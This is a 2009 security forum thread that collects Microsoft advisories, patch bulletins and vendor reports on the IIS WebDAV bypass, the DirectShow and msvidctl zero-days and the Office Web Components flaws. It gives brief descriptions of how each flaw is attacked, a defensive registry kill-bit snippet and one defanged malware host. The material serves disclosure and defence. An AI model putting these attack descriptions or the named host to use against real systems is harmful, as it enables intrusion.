Last Updated: 2009-05-16 00:05:27 UTC - "... adding certain Unicode characters to an URL makes it possible to bypass authentication in Microsoft IIS6 with WebDav and access or even upload files in folders which are supposed to be password protected... If you have WebDav active and accessible from the Internet on any of your IIS6, it is probably a wise move to hedge and turn WebDav off.."
- http://blog.zoller.lu/2009/05/iis-6-webdac-auth-bypass-and-data.html

- http://secunia.com/advisories/35109/2/
Release Date: 2009-05-18
Critical: Moderately critical
Impact: Security Bypass
Where: From remote
Solution Status: Unpatched
Software: Microsoft Internet Information Services (IIS) 5.x, Microsoft Internet Information Services (IIS) 6
Solution: Do not store sensitive files inside the webroot. Disable WebDAV support...

:fear::fear:

AplusWebMaster
2009-05-19, 12:48
FYI...

Microsoft Security Advisory (971492)
Vulnerability in Internet Information Services Could Allow Elevation of Privilege
- http://www.microsoft.com/technet/security/advisory/971492.mspx
May 18, 2009 - "Microsoft is investigating new public reports of a possible vulnerability in Microsoft Internet Information Services (IIS). An elevation of privilege vulnerability exists in the way that the WebDAV extension for IIS handles HTTP requests. An attacker could exploit this vulnerability by creating a specially crafted anonymous HTTP request to gain access to a location that typically requires authentication. We are not aware of attacks that are trying to use this vulnerability or of customer impact at this time. Microsoft is investigating the public reports...
Workarounds:
- Disable WebDAV...
- Alternate method to disable WebDAV on IIS 5.0 and IIS 5.1...
- Alternate method to disable WebDAV on IIS 5.1 and IIS 6.0...
- Change file system ACLs to deny access to the anonymous user account...

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1676
Last revised: 05/20/2009
CVSS v2 Base Score: 7.6 (HIGH)

> http://blogs.technet.com/srd/archive/2009/05/18/more-information-about-the-iis-authentication-bypass.aspx
May 18, 2009

Understanding Microsoft's KB971492 IIS5/IIS6 WebDAV Vulnerability
- http://unixwiz.net/techtips/ms971492-webdav-vuln.html
26 May 2009

:fear:

AplusWebMaster
2009-05-21, 00:22
FYI...

- http://www.theregister.co.uk/2009/05/20/iis_bug_fells_university_server/
20 May 2009 - "Hackers have wasted no time targeting a gaping hole in Microsoft's Internet Information Services webserver, according to administrators at Ball State University, who say servers that used the program were breached on Monday... On Monday, Microsoft confirmed what it called an "elevation of privilege vulnerability" in versions 5 and 6 of IIS when it runs an extension known as WebDAV. Microsoft said at the time it was unaware of any in-the-wild exploits of the vulnerability. The assessment was at odds with this warning*..."
* http://www.us-cert.gov/current/index.html#microsoft_internet_information_services_iis
updated May 19, 2009 - "... US-CERT is also aware of publicly available exploit code and active exploitation of this vulnerability... note that disabling WebDAV may affect the functionality of other applications such as SharePoint..."

- http://www.theregister.co.uk/2009/05/21/ball_state_retracts/
21 May 2009 - "Network administrators at Ball State University have retracted their claims that a campus website was brought down by a zero-day vulnerability in Microsoft's Internet Information Services webserver... corrects an advisory campus officials issued Tuesday that claimed the breach was the result of someone targeting a vulnerability in versions 5 and 6 of IIS that allows attackers to list, access, and in some cases upload files in a password-protected folders of vulnerable machines. The vulnerability exists when IIS uses the WebDAV protocol. The advisory was featured prominently on the university's website. "Initially, both Microsoft and Ball State suspected the intruder used the WebDAV vulnerability that was made public by Microsoft on May 15," Proudfoot said..."

Corrected CVE:
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1676
Last revised: 05/20/2009
CVSS v2 Base Score: 7.6 (HIGH)

// http://forums.spybot.info/showpost.php?p=312447&postcount=98

AplusWebMaster
2009-05-27, 15:40
FYI...

- http://www.theinquirer.net/inquirer/news/1137482/vista-service-pack-light
26 May 2009 - "... Microsoft has finally released the next official first aid kit for Windows Vista - SP2. If you've been running the BETA of Service Pack 2 that was released last year, then you'll need to uninstall that before installing the official service pack. Plus, you'll also need to have Service Pack 1 installed first. Although the Service Pack hasn't made it to Windows Update yet, you can now grab the official downloads from Microsoft's Download Center. The installer includes Service Pack 2 for both Windows Vista and Windows Server 2008, resulting in a 348.3MB file for 32-bit version - and a 577.4MB file for 64-bit version. Despite the massive file size, however, there's not much to get excited about. The update mainly includes all of the bits and bobs that have been released since Service Pack 1, although this doesn't include Internet Explorer 8..."

- http://technet.microsoft.com/en-us/windows/dd262148.aspx
May 26, 2009

:spider:

AplusWebMaster
2009-05-29, 02:02
FYI...

Microsoft Security Advisory (971778)
Vulnerability in Microsoft DirectShow Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/971778.mspx
May 28, 2009 - "Microsoft is investigating new public reports of a new vulnerability in Microsoft DirectX. The vulnerability could allow remote code execution if user opened a specially crafted QuickTime media file. Microsoft is aware of limited, active attacks that use this exploit code. While our investigation is ongoing, our investigation so far has shown that Windows 2000 Service Pack 4, Windows XP, and Windows Server 2003 are vulnerable; all versions of Windows Vista and Windows Server 2008 are not vulnerable... Upon completion of this investigation, Microsoft will take the appropriate action to help protect our customers..."

- http://www.theregister.co.uk/2009/05/28/critical_microsoft_directx_vulnerability/
28 May 2009 22:37 GMT - "... Microsoft has offered several work-arounds until a patch is available. The most straight-forward of them involves visiting this link* and clicking on the "Fix it" icon. (We got an error when using Firefox, but it worked fine with Internet Explorer)..."
* http://support.microsoft.com/kb/971778

> http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1537

- http://secunia.com/advisories/35268/2/
Release Date: 2009-05-29
Critical: Extremely critical
Impact: System access
Where: From remote
Solution Status: Unpatched...
Solution: Disable the parsing of QuickTime content in quartz.dll. Please see the vendor's advisory for more information. Do not browse untrusted websites or follow untrusted links. Do not open untrusted media files...

:fear:

AplusWebMaster
2009-06-04, 13:52
FYI...

Problems confirmed with Vista SP2
- http://windowssecrets.com/comp/090604#known0
2009-06-04

:sad:

AplusWebMaster
2009-06-05, 02:13
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS09-jun.mspx
June 4, 2009 - "This is an advance notification of security bulletins that Microsoft is intending to release on June 9, 2009...
(Total of -10-)

Critical -6-

Windows 1
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Windows 2
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

IE
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows, Internet Explorer...

Word
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Office...

Excel
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Office...

Office
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Office...

Important -3-

Windows 3
Maximum Severity Rating: Important
Vulnerability Impact: Elevation of Privilege
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Windows 4
Maximum Severity Rating: Important
Vulnerability Impact: Elevation of Privilege
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Windows 5
Maximum Severity Rating: Important
Vulnerability Impact: Elevation of Privilege
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Moderate -1-

Windows 6
Maximum Severity Rating: Moderate
Vulnerability Impact: Information Disclosure
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

- http://blogs.technet.com/msrc/archive/2009/06/04/june-2009-advance-notification.aspx
June 04, 2009

.

AplusWebMaster
2009-06-09, 20:55
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS09-jun.mspx
June 9, 2009 - "This bulletin summary lists security bulletins released for June 2009... The following table summarizes the security bulletins for this month in order of severity... (Total of -10-)

Critical -6-

Microsoft Security Bulletin MS09-018
Vulnerabilities in Active Directory Could Allow Remote Code Execution (971055)
- http://www.microsoft.com/technet/security/bulletin/MS09-018.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution, Denial of Service
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS09-022
Vulnerabilities in Windows Print Spooler Could Allow Remote Code Execution (961501)
- http://www.microsoft.com/technet/security/bulletin/MS09-022.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS09-019
Cumulative Security Update for Internet Explorer (969897)
- http://www.microsoft.com/technet/security/bulletin/MS09-019.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows, Internet Explorer ...
- http://atlas.arbor.net/briefs/
"...major update to IE 6, 7 and 8 for all platforms. This could affect thousands of users and, as we have seen, be used in drive by attacks for years to come. Source: MS09-019 ..."

Microsoft Security Bulletin MS09-027
Vulnerabilities in Microsoft Office Word Could Allow Remote Code Execution (969514)
- http://www.microsoft.com/technet/security/bulletin/MS09-027.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Office...

Microsoft Security Bulletin MS09-021
Vulnerabilities in Microsoft Office Excel Could Allow Remote Code Execution (969462)
- http://www.microsoft.com/technet/security/bulletin/MS09-021.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Office...

Microsoft Security Bulletin MS09-024
Vulnerability in Microsoft Works Converters Could Allow Remote Code Execution (957632)
- http://www.microsoft.com/technet/security/bulletin/MS09-024.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Office...

Important -3-

Microsoft Security Bulletin MS09-026
Vulnerability in RPC Could Allow Elevation of Privilege (970238)
- http://www.microsoft.com/technet/security/bulletin/MS09-026.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Elevation of Privilege
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS09-025
Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (968537)
- http://www.microsoft.com/technet/security/bulletin/MS09-025.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Elevation of Privilege
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS09-020
Vulnerabilities in Internet Information Services (IIS) Could Allow Elevation of Privilege (970483)
- http://www.microsoft.com/technet/security/bulletin/MS09-020.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Elevation of Privilege
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Moderate -1-

Microsoft Security Bulletin MS09-023
Vulnerability in Windows Search Could Allow Information Disclosure (963093)
- http://www.microsoft.com/technet/security/bulletin/MS09-023.mspx
Maximum Severity Rating: Moderate
Vulnerability Impact: Information Disclosure
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...
___

ISC Analysis
- http://isc.sans.org/diary.html?storyid=6538
Last Updated: 2009-06-10 13:01:38 UTC ...(Version: 2)
___

- http://www.reuters.com/article/technologyNews/idUSTRE5585IV20090609?sp=true
Jun 9, 2009 - "Microsoft Corp issued software to fix 31 security flaws in its programs, a single-day record for the company whose products are targeted by hackers because they sit on the vast majority of computers..."
___

MSRT
- http://www.microsoft.com/security/malwareremove/default.mspx
Version: 2.11
Knowledge Base (KB) Articles: http://support.microsoft.com/?kbid=890830
Date Published: 6/9/2009 ...
Recent adds:
Win32/Waledac - April 2009 (V 2.9) Moderate
Win32/Winwebsec - May 2009 (V 2.10) Moderate
Win32/InternetAntivirus - June 2009 (V 2.11) Moderate

AplusWebMaster
2009-06-10, 19:28
FYI...

Microsoft Security Advisory (971888)
Update for DNS Devolution
- http://www.microsoft.com/technet/security/advisory/971888.mspx
Published or Last Updated: 6/9/2009

Microsoft Security Advisory (971492)
Vulnerability in Internet Information Services Could Allow Elevation of Privilege
- http://www.microsoft.com/technet/security/advisory/971492.mspx
Published: May 18, 2009 | Updated: June 9, 2009 - "... We have issued MS09-020 to address this issue..." - http://www.microsoft.com/technet/security/Bulletin/MS09-020.mspx

Microsoft Security Advisory (969898)
Update Rollup for ActiveX Kill Bits
- http://www.microsoft.com/technet/security/advisory/969898.mspx
June 9, 2009 - "Microsoft is releasing a new set of ActiveX kill bits with this advisory.
The update includes a kill bit from a previously published Microsoft Cumulative Update:
• Microsoft Visual Basic 6.0 Service Pack 6 Cumulative Update (KB957924)
- http://www.microsoft.com/downloads/details.aspx?FamilyID=cb824e35-0403-45c4-9e41-459f0eb89e36&displaylang=en
The update also includes kill bits for the following third-party software:
• Derivco. This security update sets a kill bit for an ActiveX control developed by Derivco. Derivco has released a security update that addresses a vulnerability in the affected component. For more information and download locations, see the security release from Derivco. This kill bit is being set at the request of the owner of the ActiveX controls...
• eBay Advanced Image Upload Component. This security update sets a kill bit for an ActiveX control developed by eBay. eBay has released a security update that addresses a vulnerability in the affected component. For more information and download locations, see the security release from eBay. This kill bit is being set at the request of the owner of the ActiveX controls...
• HP Virtual Room v7.0. This security update sets a kill bit for an ActiveX control developed by Research In Motion (RIM). RIM has released a security update that addresses a vulnerability in the affected component. For more information and download locations, see the security release from HP. This kill bit is being set at the request of the owner of the ActiveX controls..."

Microsoft Security Advisory (945713)
Vulnerability in Web Proxy Auto-Discovery (WPAD) Could Allow Information Disclosure
- http://www.microsoft.com/technet/security/advisory/945713.mspx
Published: December 3, 2007 | Updated: June 9, 2009 - "... We have issued MS09-008 to address the WPAD issue and have released configuration guidance and updates for DNS devolution in Microsoft Security Advisory 971888. The vulnerabilities addressed are DNS Server Vulnerability in WPAD Registration Vulnerability CVE-2009-0093 and WPAD WINS Server Registration Vulnerability CVE-2009-0094..."
- http://www.microsoft.com/technet/security/Bulletin/MS09-008.mspx
- http://www.microsoft.com/technet/security/advisory/971888.mspx
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0093
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0094

:fear:

AplusWebMaster
2009-06-20, 02:48
FYI...

DirectShow Exploit In the Wild, Part II
- http://preview.tinyurl.com/lhmtkd
06-19-2009 Symantec Security Response Blog - "... With no patch for this vulnerability available as of yet, the fact that we are seeing this exploit used more commonly in the wild is worrying... To trigger this vulnerability, attackers are currently enticing users to visit a malicious page. Attackers have become quite adept at doing this by embedding iframe tags in legitimate pages, among other techniques. This is the most likely attack vector. We have seen iframe tags pointing to this exploit inside phishing pages already and we do expect to see iframe tags added to more pages. The vulnerability exists in the code within Microsoft DirectX and can be triggered by a specially crafted QuickTime media file. The attackers Web page will try to play the malicious QuickTime file, not using the QuickTime player, but using Windows Media Player instead. This will trigger the vulnerability and allow the attacker to execute code on the visitor’s computer. The vulnerable code exists in quartz.dll and is a null-byte overwrite. It allows the attacker to overwrite just one byte of memory with a null byte... (end-user) work-around*."
* http://support.microsoft.com/kb/971778#FixItForMeAlways
June 3, 2009 (Get the Enable Workaround "FixIt" here. MUST be run in Admin mode.)

- http://www.microsoft.com/technet/security/advisory/971778.mspx

> http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1537
Last revised: 06/09/2009
CVSS v2 Base Score: 9.3 (HIGH)
Impact Type: Allows unauthorized disclosure of information; Allows unauthorized modification; Allows disruption of service...

:fear::mad:

AplusWebMaster
2009-07-06, 15:18
FYI...

0-day in MS DirectShow (msvidctl.dll) used in drive-by attacks
- http://isc.sans.org/diary.html?storyid=6733
Last Updated: 2009-07-06 08:56:55 UTC - "A 0-day exploit within the msVidCtl component of Microsoft DirectShow is actively being exploited through drive-by attacks using thousands of newly compromised web sites, according to CSIS. The code has been published in the public domain via a number of Chinese web sites. Please keep a watchful eye on your AV and IDS/IPS vendors updates to ensure coverage as early as possible on this exploit as it is likely to be widely deployed with the code being available. A valid work around for the attack vector is available which set's the kill bit on the vulnerable DLL.
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerActiveX Compatibility{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]
"Compatibility Flags"=dword:00000400 ..."

- http://securitylabs.websense.com/content/Alerts/3432.aspx
07.06.2009 - "Websense... is currently tracking -legitimate- sites that have been compromised to lead to a zero-day exploit targeting an Internet Explorer vulnerability. The compromised sites lead to a handful of payload sites hosting the exploit code which targets msvidctl.dll - an ActiveX control for streaming video. The new zero-day exploit has been added to other exploits on Chinese payload sites. We have been monitoring these sites, which have been systematically injected throughout the last year..."

- http://secunia.com/advisories/35683/2/
Release Date: 2009-07-06
Critical: Extremely critical
Impact: System access
Where: From remote
Solution Status: Unpatched
OS: Microsoft Windows XP Home Edition, Microsoft Windows XP Professional ...
... The vulnerability is caused due to a boundary error in the ActiveX control for streaming video (msvidctl.dll) and can be exploited to cause a stack-based buffer overflow via specially crafted image content.
Successful exploitation allows execution of arbitrary code when a user e.g. visits a malicious website.
NOTE: The vulnerability is currently being actively exploited...
Solution: Set the kill-bit for the affected ActiveX control...

- http://www.f-secure.com/weblog/archives/00001716.html
July 6, 2009 - "... The exploit targets Microsoft Internet Explorer… so one work around is kind of obvious. Use some other browser besides Internet Explorer until this vulnerability is patched..."

>>> http://support.microsoft.com/kb/972890#FixItForMe
July 6, 2009 (Get the Enable Workaround "FixIt" here. MUST be run in Admin mode.)

:fear:

AplusWebMaster
2009-07-06, 22:20
FYI...

Microsoft Security Advisory (972890)
Vulnerability in Microsoft Video ActiveX Control Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/972890.mspx
July 06, 2009 - "Microsoft is investigating a privately reported vulnerability in Microsoft Video ActiveX Control. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. When using Internet Explorer, code execution is remote and may not require any user intervention. We are aware of attacks attempting to exploit the vulnerability.
Our investigation has shown that there are no by-design uses for this ActiveX Control in Internet Explorer which includes all of the Class Identifiers within the msvidctl.dll that hosts this ActiveX Control. For Windows XP and Windows Server 2003 customers, Microsoft is recommending removing support for this ActiveX Control within Internet Explorer using all the Class Identifiers listed in the Workaround section. Though unaffected by this vulnerability, Microsoft is recommending that Windows Vista and Windows Server 2008 customers remove support for this ActiveX Control within Internet Explorer using the same Class Identifiers as a defense-in-depth measure. Customers may prevent the Microsoft Video ActiveX Control from running in Internet Explorer, either manually using the instructions in the Workaround section or automatically using the solution found in Microsoft Knowledge Base Article 972890*..."
* http://support.microsoft.com/kb/972890#FixItForMe
July 6, 2009 (Get the Enable Workaround "FixIt" here. MUST be run in Admin mode.)

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0015
Last revised: 07/09/2009
CVSS v2 Base Score: 9.3 (HIGH)
Impact Type: Provides administrator access, Allows complete confidentiality, integrity, and availability violation; Allows unauthorized disclosure of information; Allows disruption of service ...

- http://securitylabs.websense.com/content/Blogs/3434.aspx
07.09.2009

:fear:

AplusWebMaster
2009-07-07, 13:14
FYI...

IE 0day exploit domains...
- http://isc.sans.org/diary.html?storyid=6739
Last Updated: 2009-07-07 02:33:54 UTC - "This diary entry contains a list of domains that are exploiting the new IE-0day as well as secondary domains that are hosting potentially malicious binaries utilized in these attacks. This list has been produced as a combined effort of researchers, vendors, and volunteers. You can thank the groups below for their efforts and their willingness to share this information with the public. This list is intended to serve as a quick way to provide protection against these attacks by identifying domains that are hosting these (and potentially other) exploits. This list is not formatted for any specific file format, it is up to you the reader to translate this date into the proper formatting that your environment requires... The information provided has had varying degrees of verification performed on it. As such this information is provided as is. There may very well be mistakes, mistakes that may result in legitimate sites being blocked if you choose to use this list as a block list..."

:fear:

AplusWebMaster
2009-07-07, 15:40
FYI...

0-day exploit leads to KILLAV
- http://blog.trendmicro.com/zero-day-microsoft-directshow-mpeg2tunerequest-exploit-leads-to-killav-malware/
July 6, 2009 - "... Around 967 Chinese websites are reported to be infected by a malicious script that leads users to successive site redirections and lands them to download a .JPG file containing the exploit. Trend Micro detects it as JS_DLOADER.BD... Upon successful exploitation, the script downloads another malware detected as WORM_KILLAV.AI. This malware disables and terminates antivirus software processes, and drops other malware on the affected system..."
(Screenshots available at the URL above.)

Edit/update - see: http://secunia.com/advisories/35683/2/
Last Update: 2009-07-14
Solution Status: Vendor Patch
MS09-032 (KB973346):
http://www.microsoft.com/technet/security/Bulletin/MS09-032.mspx ...

:fear::spider::fear:

AplusWebMaster
2009-07-10, 00:05
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms09-jul.mspx
July 09, 2009 - "This is an advance notification of security bulletins that Microsoft is intending to release on July 14, 2009... (Total of -6-)

Critical -3-

Windows 1
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Windows 2
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows...

Windows 3
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows...

Important -3-

VPC/VS
Maximum Severity Rating: Important
Vulnerability Impact: Elevation of Privilege
Restart Requirement: Requires restart
Affected Software: Virtual PC, Virtual Server...

ISA
Maximum Severity Rating: Important
Vulnerability Impact: Elevation of Privilege
Restart Requirement: Requires restart
Affected Software: Microsoft ISA Server...

Publisher
Maximum Severity Rating: Important
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Office...

AplusWebMaster
2009-07-13, 18:33
FYI...

Microsoft Security Advisory (973472)
Vulnerability in Microsoft Office Web Components Control Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/973472.mspx
July 13, 2009 - "Microsoft is investigating a privately reported vulnerability in Microsoft Office Web Components. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. When using Internet Explorer, code execution is remote and may not require any user intervention. We are aware of attacks attempting to exploit the vulnerability. Customers may prevent the Microsoft Office Web Components from running in Internet Explorer either manually, using the instructions in the Workaround section, or automatically, using the solution found in Microsoft Knowledge Base Article 973472*..."
* http://support.microsoft.com/kb/973472#FixItForMe
July 13, 2009 - Revision: 1.2

- http://secunia.com/advisories/35800/2/
Release Date: 2009-07-13
Critical: Extremely critical
Impact: System access
Where: From remote
Solution Status: Unpatched
Solution: Set the kill-bit for the affected ActiveX control.
Provided and/or discovered by: Reported as a 0-day...

- http://isc.sans.org/diary.html?storyid=6778
Last Updated: 2009-07-14 01:35:23 UTC ...(Version: 8) - "... This vulnerability exists in the ActiveX control used by IE to display Excel spreadsheets... we are seeing active exploit pages... Start working on this ASAP. The impact is remote code execution with the privileges of the logged in user running Internet Explorer, and might not require user intervention. As in browse to a nasty web site and be pwn3d..."

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1136

:fear:

AplusWebMaster
2009-07-14, 21:29
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms09-jul.mspx
July 14, 2009 - "This bulletin summary lists security bulletins released for July 2009...
(Total of -6-)

Critical -3-

Microsoft Security Bulletin MS09-029
Vulnerabilities in the Embedded OpenType Font Engine Could Allow Remote Code Execution (961371)
- http://www.microsoft.com/technet/security/bulletin/MS09-029.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS09-028
Vulnerabilities in Microsoft DirectShow Could Allow Remote Code Execution (971633)
- http://www.microsoft.com/technet/security/bulletin/MS09-028.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS09-032
Cumulative Security Update of ActiveX Kill Bits (973346)
- http://www.microsoft.com/technet/security/bulletin/MS09-032.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows...

Important -3-

Microsoft Security Bulletin MS09-033
Vulnerability in Virtual PC and Virtual Server Could Allow Elevation of Privilege (969856)
- http://www.microsoft.com/technet/security/bulletin/MS09-033.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Elevation of Privilege
Restart Requirement: Requires restart
Affected Software: Virtual PC, Virtual Server...

Microsoft Security Bulletin MS09-031
Vulnerability in Microsoft ISA Server 2006 Could Cause Elevation of Privilege (970953)
- http://www.microsoft.com/technet/security/bulletin/MS09-031.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Elevation of Privilege
Restart Requirement: Requires restart
Affected Software: Microsoft ISA Server...

Microsoft Security Bulletin MS09-030
Vulnerability in Microsoft Publisher Could Allow Remote Code Execution (969516)
- http://www.microsoft.com/technet/security/bulletin/MS09-030.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Office...
___

ISC Analysis
- http://isc.sans.org/diary.html?storyid=6790
Last Updated: 2009-07-14 17:34:08 UTC - "...MS09-032 - Note there are recently discovered killbits one should set that are -not- included in this update..." (See: http://support.microsoft.com/kb/973472#FixItForMe - July 14, 2009)
___

MSRT
- http://support.microsoft.com/?kbid=890830
Release Date: July 14, 2009
(Recent additions)
Win32/Winwebsec May 2009 (V 2.10) Moderate
Win32/InternetAntivirus June 2009 (V 2.11) Moderate
Win32/FakeSpypro July 2009 (V 2.12) Moderate

AplusWebMaster
2009-07-16, 12:58
FYI...

Microsoft Security Bulletin MS09-032 - Critical
Cumulative Security Update of ActiveX Kill Bits (973346)
- http://www.microsoft.com/technet/security/bulletin/ms09-032.mspx
Published: July 14, 2009 | Updated: July 15, 2009
"... Frequently Asked Questions (FAQ) Related to This Security Update
If I have applied the workaround from Microsoft Security Advisory 972890, do I need to install this security update?
Microsoft Security Advisory 972890 describes a workaround that prevents the Microsoft Video ActiveX Control from running in Internet Explorer. Customers can either manually apply this workaround or use the automated Microsoft Fix it solution in Microsoft Knowledge Base Article 972890 to enable the workaround. Customers who have applied this workaround using either method do -not- need to install this security update.
... Customers who want this update to be offered to Microsoft Windows 2000, Windows XP, and Windows Server 2003 systems must remove the kill bit settings previously applied by the workaround by deleting the registry keys referenced in the workaround, "Prevent COM objects from running in Internet Explorer."
• V1.1 (July 15, 2009): Clarified a FAQ about the workaround from Microsoft Security Advisory 972890, added a FAQ about Microsoft Security Advisory 973472, and added a FAQ about the kill bits contained in this bulletin.

- http://windowssecrets.com/2009/07/16/07-Killbit-update-requires-Fix-it-undo-for-XP-PCs
July 16, 2009 - "... Anyone who applied the Fix-it workaround won't see the cumulative patch among the updates being offered to XP systems because the workaround removed the affected Registry keys."

AplusWebMaster
2009-07-25, 10:14
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms09-jul-ans.mspx
July 24, 2009 - "This is an advance notification of two out-of-band security bulletins that Microsoft is intending to release on July 28, 2009. One bulletin will be for the Microsoft Visual Studio product line; application developers should be aware of updates available affecting certain types of applications. The second bulletin contains defense-in-depth changes to Internet Explorer to address attack vectors related to the Visual Studio bulletin, as well as fixes for unrelated vulnerabilities that are rated Critical...

Internet Explorer
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows, Internet Explorer...

Visual Studio
Maximum Severity Rating: Moderate
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Visual Studio...

AplusWebMaster
2009-07-28, 02:11
FYI...

MS OWC vuln used in site compromise
- http://securitylabs.websense.com/content/Alerts/3451.aspx
07.27.2009 - "Websense... has discovered that the Center for Defense Information (CDI) Web site has been compromised. The site is injected with a JavaScript code that exploits the latest Microsoft Office Web Components Control vulnerability... The vulnerability is in the Internet Explorer ActiveX control used to display Excel spreadsheets (CVE-2009-1136)... The exploit code pushes a Trojan from hxxp ://vicp .cc/. The Trojan has more than 50% detection*. Note that Microsoft provides a workaround for the problem in their Fixit** program..."

* http://www.virustotal.com/analisis/0ef75757f2f8e8a4ea1aa4288d52eb2deb8b9df804af33da9f0ef3baee60138c-1248724806
File solar.exe received on 2009.07.27 20:00:06 (UTC)
Result: 24/41 (58.54%)

** http://support.microsoft.com/kb/973472#FixItForMe

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1136
Last revised: 07/16/2009
CVSS v2 Base Score: 9.3 (HIGH)

:mad:

AplusWebMaster
2009-07-28, 20:38
FYI...

Microsoft Security Advisory (973882)
Vulnerabilities in Microsoft Active Template Library (ATL) Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/973882.mspx
July 28, 2009 - "Microsoft is releasing this security advisory to provide information about our ongoing investigation into vulnerabilities in the public and private versions of Microsoft's Active Template Library (ATL). This advisory also provides guidance as to what developers can do to help ensure that the controls and components they have built are not vulnerable to the ATL issues; what IT Professionals and consumers can do to mitigate potential attacks that use the vulnerabilities; and what Microsoft is doing as part of its ongoing investigation into the issue described in this advisory. This security advisory will also provide a comprehensive listing of all Microsoft Security Bulletins and Security Updates related to the vulnerabilities in ATL. Microsoft's investigation into the private and public versions of ATL is ongoing, and we will release security updates and guidance as appropriate as part of the investigation process...
Updates related to ATL: Updates released on July 28, 2009...

Microsoft Security Bulletin MS09-034 - Critical
Cumulative Security Update for Internet Explorer (972260)
- http://www.microsoft.com/technet/security/bulletin/ms09-034.mspx
July 28, 2009

Microsoft Security Bulletin MS09-035 - Moderate
Vulnerabilities in Visual Studio Active Template Library Could Allow Remote Code Execution (969706)
- http://www.microsoft.com/technet/security/bulletin/ms09-035.mspx
July 28, 2009

- http://www.microsoft.com/technet/security/bulletin/ms09-jul-ans.mspx
• V2.0 (July 28, 2009): Added Microsoft Security Bulletins MS09-034, Cumulative Security Update for Internet Explorer (972260), and MS09-035, Vulnerabilities in Visual Studio Active Template Library Could Allow Remote Code Execution (969706). Also added the bulletin webcast links for these out-of-band security bulletins.
___

- http://isc.sans.org/diary.html?storyid=6874
Last Updated: 2009-07-28 17:19:30 UTC ...(Version: 2)
___

- http://secunia.com/advisories/35962/2/
